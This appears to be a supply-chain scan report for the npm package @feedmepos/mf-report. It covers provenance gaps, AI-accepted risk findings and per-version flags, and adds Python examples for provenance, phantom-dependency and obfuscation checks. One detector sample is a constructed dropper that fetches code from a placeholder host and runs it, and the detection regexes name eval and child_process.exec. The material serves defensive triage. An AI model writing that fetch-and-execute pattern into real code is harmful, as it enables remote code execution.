@feedmepos/mf-report
v5 portal report UI
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between this tarball and the public source — the axios compromise (March 2026) relied on exactly this gap.
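As an added example (not part of this report or of the package), the function below reads a registry packument version entry and reports whether it advertises a Sigstore/SLSA provenance attestation, which is the metadata check behind the "published without Sigstore provenance" findings listed per version further down. The two entries are constructed samples, not real registry data for @feedmepos/mf-report.

```python
import json

# Constructed sample registry entries (not real data for @feedmepos/mf-report).
# Shape follows the npm registry packument: versions[<v>].dist.attestations
# is present only when the publisher attached a provenance attestation.
WITH_PROVENANCE = {
    "name": "example-pkg",
    "version": "1.2.3",
    "dist": {
        "tarball": "https://registry.npmjs.org/example-pkg/-/example-pkg-1.2.3.tgz",
        "integrity": "sha512-AAAA",
        "attestations": {
            "url": "https://registry.npmjs.org/-/npm/v1/attestations/example-pkg@1.2.3",
            "provenance": {"predicateType": "https://slsa.dev/provenance/v1"},
        },
    },
}

WITHOUT_PROVENANCE = {
    "name": "example-pkg",
    "version": "1.2.2",
    "dist": {
        "tarball": "https://registry.npmjs.org/example-pkg/-/example-pkg-1.2.2.tgz",
        "integrity": "sha512-BBBB",
    },
}

# Predicate types used by npm provenance attestations.
SLSA_PREDICATES = {
    "https://slsa.dev/provenance/v0.2",
    "https://slsa.dev/provenance/v1",
}


def provenance_status(version_doc: dict) -> dict:
    """Report whether a packument version entry advertises SLSA provenance.

    This only inspects registry metadata. It does not fetch or verify the
    Sigstore bundle; `npm audit signatures` does the cryptographic check.
    """
    dist = version_doc.get("dist", {})
    attestations = dist.get("attestations") or {}
    predicate = (attestations.get("provenance") or {}).get("predicateType")
    return {
        "version": version_doc.get("version"),
        "has_provenance": predicate in SLSA_PREDICATES,
        "predicate_type": predicate,
        "attestations_url": attestations.get("url"),
        "integrity": dist.get("integrity"),
    }


def summarize(packument_versions: list) -> list:
    """One line per version, in the style of the per-version findings."""
    out = []
    for v in packument_versions:
        s = provenance_status(v)
        if s["has_provenance"]:
            out.append(f'v{s["version"]}: provenance {s["predicate_type"]} ({s["attestations_url"]})')
        else:
            out.append(f'v{s["version"]}: published without Sigstore provenance')
    return out


if __name__ == "__main__":
    print(json.dumps(provenance_status(WITH_PROVENANCE), indent=2))
    for line in summarize([WITH_PROVENANCE, WITHOUT_PROVENANCE]):
        print(line)
```

Against the live registry the equivalent lookup is `npm view <pkg>@<version> dist.attestations --json`. A present `attestations` field is a claim, not a verification: run `npm audit signatures` (npm 9.5 or later) in a project that depends on the package to have the attestation bundle fetched and checked against Sigstore, and compare the `integrity` value with the tarball you actually installed.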
Maintainers
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | obfuscated-file:dist/app-DMXIz8ol.js | AI (source-diff): Standard Vite bundle output for this Vue micro-frontend; not obfuscation. | ai | |
| source-diff | obfuscated-file:dist/assets/processTableData.worker-CQMw9rvu.js | AI (source-diff): Minified web worker bundle for table data processing; consistent with package purpose. | ai | |
| source-diff | net-exec-file:dist/NavigationTab.vue_vue_type_script_setup_true_lang-Ck7HaJRh.js | AI (source-diff): Network calls and dynamic imports are normal Vue router/component patterns in this micro-frontend. | ai | |
| source-diff | obfuscated-file:dist/NavigationTab.vue_vue_type_script_setup_true_lang-Ck7HaJRh.js | AI (source-diff): Standard Vite-compiled Vue SFC chunk; not obfuscation. | ai | |
| source-diff | obfuscated-file:dist/Integrations-CpMUHiCw.js | AI (source-diff): Standard Vite bundle chunk; not obfuscation. | ai | |
| source-diff | obfuscated-file:dist/GlobalFilterSelect.vue_vue_type_script_setup_true_lang-ZAOWE1vp.js | AI (source-diff): Standard Vite-compiled Vue SFC chunk; not obfuscation. | ai | |
| source-diff | obfuscated-file:dist/assets/formatChartData.worker-BlVUDagT.js | AI (source-diff): Minified web worker bundle; consistent with chart data processing in this package. | ai | |
| npm-metadata | url-dep:extra-packages | AI (npm-metadata): Local file dep is in devDependencies only; does not affect published package consumers. | ai | |
| dependencies | unvetted-dep:@feedmepos/custom-attributes | AI (dependencies): Same org scope (@feedmepos); internal dependency stable across versions. | ai | |
| dependencies | unvetted-dep:@feedmepos/feature-flag | AI (dependencies): Same org scope (@feedmepos); internal dependency stable across versions. | ai | |
| npm-metadata | url-dep:query-engine-dart | AI (npm-metadata): File-local devDependency used only during build; not shipped in published dist. | ai | |
| npm-metadata | url-dep:report-v4-dart | AI (npm-metadata): File-local devDependency used only during build; not shipped in published dist. | ai | |
| source-diff | obfuscated-file:dist/assets/formatChartData.worker-CVp--g2e.js | AI (source-diff): Minified web worker bundle; Dart/JS interop boilerplate, no exfiltration. | ai | |
| source-diff | obfuscated-file:dist/app-VSV4uxyh.js | AI (source-diff): Standard Vite minified bundle for this Vue micro-frontend; pattern is stable across versions. | ai | |
| source-diff | obfuscated-file:dist/BaseDialog.vue_vue_type_script_setup_true_lang-Be3F_dkn.js | AI (source-diff): Minified Vue component chunk from Vite build; no malicious patterns. | ai | |
| source-diff | obfuscated-file:dist/Integrations-T5mzrxXG.js | AI (source-diff): Minified Vue route chunk from Vite build; no malicious patterns. | ai | |
| source-diff | obfuscated-file:dist/NavigationTab.vue_vue_type_script_setup_true_lang-CoaKAOy7.js | AI (source-diff): Minified Vue component chunk; imports only from same-package and @feedmepos/* deps. | ai | |
| source-diff | net-exec-file:dist/NavigationTab.vue_vue_type_script_setup_true_lang-CoaKAOy7.js | AI (source-diff): Network calls and dynamic component resolution are standard Vue router/async-component patterns in this micro-frontend. | ai | |
| source-diff | obfuscated-file:dist/assets/processTableData.worker-CklDKC06.js | AI (source-diff): Minified web worker for table data processing; same Dart/JS boilerplate as formatChartData worker. | ai | |
| phantom-deps | phantom-dep:dayjs | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:axios | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:xlsx | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:@feedmepos/feature-flag | AI (phantom-deps): Same-org dep; bundled micro-frontend pattern. | ai | |
| phantom-deps | phantom-dep:@casl/ability | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:vuedraggable | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:consola-loki | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:change-case | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:vue-i18n | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:@feedmepos/hrm-permission | AI (phantom-deps): Same-org dep; bundled micro-frontend pattern. | ai | |
| phantom-deps | phantom-dep:@feedmepos/custom-attributes | AI (phantom-deps): Same-org dep; bundled micro-frontend pattern. | ai | |
| phantom-deps | phantom-dep:chart.js | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:consola | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:uuid | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai | |
| phantom-deps | phantom-dep:dotenv | AI (phantom-deps): Bundled micro-frontend; deps declared for peer resolution, not direct import. | ai |
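The phantom-dep rows above come down to a diff between package.json and the import specifiers actually present in dist/. Added example, not the scanner's or the project's code: it extracts ESM and CommonJS specifiers with regexes (written to cope with minified output that drops whitespace), maps them to package names, and reports both directions, declared but never imported (the situation the reasoning column describes for a bundled micro-frontend) and imported but not declared (the classic phantom dependency that only resolves through a peer or a hoisted transitive). The package.json and the dist chunk are constructed samples; @scope/feature-flag stands in for a same-org dependency.

```python
import re

# Constructed package.json and dist chunk (not the real @feedmepos/mf-report files).
PACKAGE_JSON = {
    "name": "example-mf",
    "dependencies": {
        "dayjs": "^1.11.0",
        "axios": "^1.6.0",
        "vue": "^3.4.0",
        "@scope/feature-flag": "^2.0.0",
    },
    "peerDependencies": {"vue": "^3.4.0"},
}

DIST_CHUNK = r"""
import{ref as e,computed as t}from"vue";import axios from "axios";
import Chart from "chart.js/auto";
const n=()=>import("./Integrations-abc123.js");
const f=require("@scope/feature-flag/dist/index.js");
export{n as Integrations};
"""

# Import specifiers as they appear in ESM/CJS output, minified or not.
# Heuristic regexes, not a parser: good enough for bundler output.
IMPORT_PATTERNS = [
    re.compile(r"""\bimport\s*(?:[^'";]*?\s*from\s*)?["']([^"']+)["']"""),   # import x from "y" / import "y"
    re.compile(r"""\bimport\s*\(\s*["']([^"']+)["']\s*\)"""),                  # import("y")
    re.compile(r"""\brequire\s*\(\s*["']([^"']+)["']\s*\)"""),                 # require("y")
    re.compile(r"""\bexport\s*(?:\*|\{[^}]*\})\s*from\s*["']([^"']+)["']"""),  # export * from "y"
]


def package_name(specifier: str):
    """Map an import specifier to the npm package that resolves it.

    Relative paths and Node builtins return None; scoped packages keep
    their scope ("@scope/pkg/sub/path" -> "@scope/pkg").
    """
    if specifier.startswith((".", "/", "node:")):
        return None
    parts = specifier.split("/")
    if specifier.startswith("@") and len(parts) >= 2:
        return "/".join(parts[:2])
    return parts[0]


def imported_packages(sources) -> set:
    """Set of package names imported anywhere in the given source texts."""
    found = set()
    for src in sources:
        for pattern in IMPORT_PATTERNS:
            for spec in pattern.findall(src):
                name = package_name(spec)
                if name:
                    found.add(name)
    return found


def phantom_deps(package_json: dict, sources) -> dict:
    """Compare declared dependencies with what the shipped code imports.

    declared_not_imported: listed in "dependencies" but never imported.
    imported_not_declared: imported but absent from dependencies and
        peerDependencies, so it resolves only by accident of hoisting.
    """
    declared = set(package_json.get("dependencies", {}))
    peers = set(package_json.get("peerDependencies", {}))
    imported = imported_packages(sources)
    return {
        "declared_not_imported": sorted(declared - imported),
        "imported_not_declared": sorted(imported - declared - peers),
    }


if __name__ == "__main__":
    print(phantom_deps(PACKAGE_JSON, [DIST_CHUNK]))
```

For a real package, feed every file under dist/ to `phantom_deps`; a dependency that is declared, never imported, and not a peer is a candidate for removal, since each unused entry is one more package whose compromise would still be installed by consumers.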
Versions (showing 8 of 8)
| Version | Deps | Published |
|---|---|---|
| 5.25.8 | 20 / 20 | |
| 5.23.1 | 20 / 20 | |
| 5.22.31 | 20 / 20 | |
| 5.22.15 | 20 / 20 | |
| 5.22.12 | 20 / 20 | |
| 5.22.3 | 18 / 20 | |
| 5.22.1 | 18 / 20 | |
| 5.7.2 | 18 / 21 |
v5.25.8
8 findings
- 6 × obfuscated-file: Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- 1 × net-exec-file: Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- 1 × no provenance: Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
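The two heuristics behind this version's findings (a line over 3000 chars; a network call and dynamic code execution in the same file) are cheap to reproduce and, more usefully, to triage. Added example, not the scanner's or the project's code: it runs both over four constructed JavaScript samples and adds the check a reviewer actually uses to separate Vite minifier output from obfuscation proper, namely javascript-obfuscator style `_0x` identifiers and hex-escaped string literals. The threshold and the API patterns are my assumptions about what the report measures; dynamic import() is deliberately not counted as code execution, matching the reasoning given for the NavigationTab chunks.

```python
import re

MAX_LINE_CHARS = 3000   # threshold quoted by the report's obfuscated-file rule

# Browser/Node network primitives followed by a call paren.
NETWORK_RE = re.compile(
    r"\b(?:fetch|XMLHttpRequest|WebSocket|sendBeacon|https?\.(?:request|get))\s*\("
)
# Dynamic code execution. Plain import() is deliberately NOT listed: lazy
# route chunks use it, and the report's reasoning treats it as normal.
DYNAMIC_EXEC_RE = re.compile(
    r"\b(?:eval|Function|vm\.runIn(?:New|This)Context|child_process\.exec(?:Sync)?|execSync)\s*\("
)
# Markers left by javascript-obfuscator style tooling and absent from plain
# minifier output: _0x-prefixed identifiers and hex-escaped string literals.
OBFUSCATOR_ID_RE = re.compile(r"\b_0x[0-9a-fA-F]{4,}\b")
HEX_ESCAPE_RE = re.compile(r"\\x[0-9a-fA-F]{2}")


def scan_file(path: str, text: str) -> dict:
    """Apply the two report heuristics plus an obfuscator-marker count."""
    lines = text.splitlines()
    longest = max((len(line) for line in lines), default=0)
    has_net = NETWORK_RE.search(text) is not None
    has_exec = DYNAMIC_EXEC_RE.search(text) is not None
    findings = []
    if longest > MAX_LINE_CHARS:
        findings.append("obfuscated-file")
    if has_net and has_exec:
        findings.append("net-exec-file")
    return {
        "path": path,
        "longest_line": longest,
        "network": has_net,
        "dynamic_exec": has_exec,
        "obfuscator_markers": len(OBFUSCATOR_ID_RE.findall(text)) + len(HEX_ESCAPE_RE.findall(text)),
        "findings": findings,
    }


def triage(path: str, text: str) -> dict:
    """Reviewer shortcut: a long-line hit with zero obfuscator markers is the
    minifier-output case the accepted-risks table describes."""
    result = scan_file(path, text)
    if "obfuscated-file" in result["findings"] and result["obfuscator_markers"] == 0:
        result["note"] = "long lines but no obfuscator markers; likely minified"
    return result


# Constructed samples (not files from the real package).
MINIFIED_CHUNK = "const a=[" + ",".join(str(i) for i in range(1000)) + "];export{a};\n"
ROUTER_CHUNK = (
    'const Integrations=()=>import("./Integrations-abc123.js");\n'
    'export async function load(){const r=await fetch("/api/report");return r.json();}\n'
)
DROPPER_LIKE = (
    '(async()=>{const r=await fetch("https://example.invalid/p.txt");'
    'const s=await r.text();new Function(s)();})();\n'
)
OBFUSCATED_SNIPPET = r'var _0x3f2a=["\x68\x65\x6c\x6c\x6f"];console.log(_0x3f2a[0]);' + "\n"


if __name__ == "__main__":
    samples = [
        ("dist/app-XXXX.js", MINIFIED_CHUNK),
        ("dist/NavigationTab-XXXX.js", ROUTER_CHUNK),
        ("dist/loader.js", DROPPER_LIKE),
        ("dist/strings.js", OBFUSCATED_SNIPPET),
    ]
    for path, text in samples:
        print(triage(path, text))
```

The minified chunk trips only the line-length rule and carries no obfuscator markers; the router chunk makes a network call but has no dynamic execution and so is clean under these rules; the dropper-like sample is the one that deserves a human look. A regex pass like this is a triage aid, not a verdict: a loader can split `fetch` and `eval` across two chunks, so the accepted-risk reasoning above (imports only from same-package and same-org modules) is the stronger check.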
v5.23.1
8 findings
- 6 × obfuscated-file: Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- 1 × net-exec-file: Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- 1 × no provenance: Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v5.22.15
1 finding
- no provenance: Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v5.22.12
1 finding
- no provenance: Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v5.22.3
1 finding
- no provenance: Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v5.22.1
1 finding
- no provenance: Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v5.7.2
1 finding
- no provenance: Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.